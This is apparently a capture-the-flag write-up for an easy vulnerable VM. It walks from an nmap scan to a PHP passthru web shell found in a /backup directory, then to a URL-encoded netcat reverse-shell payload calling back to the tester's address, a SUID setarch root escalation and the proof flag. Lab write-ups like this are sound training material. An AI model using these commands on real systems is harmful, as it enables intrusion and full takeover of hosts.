Introduction

Difficulty: Easy
Tested: VMware Workstation 15.x Pro (This works better with VMware rather than VirtualBox)
Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root).

This is another easy rated box from the same people who made Chili.

nmap

This time we get four ports:

  1. 22/tcp open ssh
  2. 80/tcp open http
  3. 7755/tcp open unknown
  4. 33060/tcp open mysqlx

With a detail scan we find out that port 80 is running nginx and port 7755 is another HTTP server, but this time it’s apache. Nmap isn’t sure what port 33060 is, despite suggesting it may be mysqlx.

HTTP

Fuzzing for subdomains turns up nothing, and gobusting turns up just a single directory - /backup. We get a picture of a cherry from the front page of the webservers, but this time I didn’t bother with trying stego techniques on it. The two webservers appear basically identical, except on apache we can access /backup whereas on nginx it’s forbidden.

So, what’s in backup? This stuff:

  1. command.php 2020-09-07 03:30 293
  2. latest.tar.gz 2020-09-01 18:54 12M
  3. master.zip 2020-09-07 03:33 11M
  4. master.zip.bak 2020-09-07 03:34 11M

We download these files, and the interesting one is command.php. Here’s what it contains:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Backup</title>
</head>
<body>
<!-- </?php echo passthru($_GET['backup']); ?/> -->
</body>
</html>

Hmm. So what happens if we do this?:

http://192.168.1.81:7755/backup/command.php?backup=whoami

Response: www-data

So this gives us our RCE.

Shell

I used Burp Suite with the following payload:

GET /backup/command.php?backup=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.1.77+1235+>/tmp/f HTTP/1.1

to get a shell, and then I ran Linpeas.

Privesc

It’s an SUID binary; this time it’s setarch

$ setarch $(arch) /bin/sh -p
whoami
root
cd /root
ls -lash
total 44K
4.0K drwx------  5 root root 4.0K Sep  7 04:21 .
4.0K drwxr-xr-x 20 root root 4.0K Sep  7 02:18 ..
4.0K -rw-------  1 root root  164 Sep  7 04:21 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
4.0K drwxr-xr-x  3 root root 4.0K Sep  7 02:33 .local
4.0K -rw-------  1 root root   18 Sep  7 02:37 .mysql_history
4.0K -rw-r--r--  1 root root  161 Dec  5  2019 .profile
4.0K drwx------  2 root root 4.0K Sep  7 02:21 .ssh
4.0K -rw-r--r--  1 root root  255 Sep  7 04:13 .wget-hsts
4.0K -rw-r--r--  1 root root   46 Sep  7 04:20 proof.txt
4.0K drwxr-xr-x  3 root root 4.0K Sep  7 02:21 snap
cat proof.txt
Sun_CSR_TEAM.af6d45da1f1181347b9e2139f23c6a5b

So yes, it was easy after all.